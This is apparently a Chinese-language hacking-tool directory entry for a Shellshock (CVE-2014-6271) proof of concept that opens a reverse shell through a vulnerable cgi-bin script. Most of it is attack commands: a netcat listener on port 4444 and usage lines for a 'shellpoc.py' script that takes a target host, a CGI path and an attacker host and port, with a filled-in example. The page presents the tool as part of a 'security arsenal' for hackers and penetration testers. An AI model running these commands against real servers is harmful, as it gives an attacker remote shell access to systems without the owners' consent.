黑客、渗透测试和网络安全工具,武装您的安全武器库!
Shellshock POC | CVE-2014-6271 | cgi-bin反向shell
发现我们社区最常用的工具。
探索所有工具
浏览我们的工具集合
nc -l -p 4444
python shellpoc.py <host> <vulnerable CGI> <attackhost/IP>
python shellpoc.py 10.10.10.101 /cgi-bin/status 10.10.10.1/4444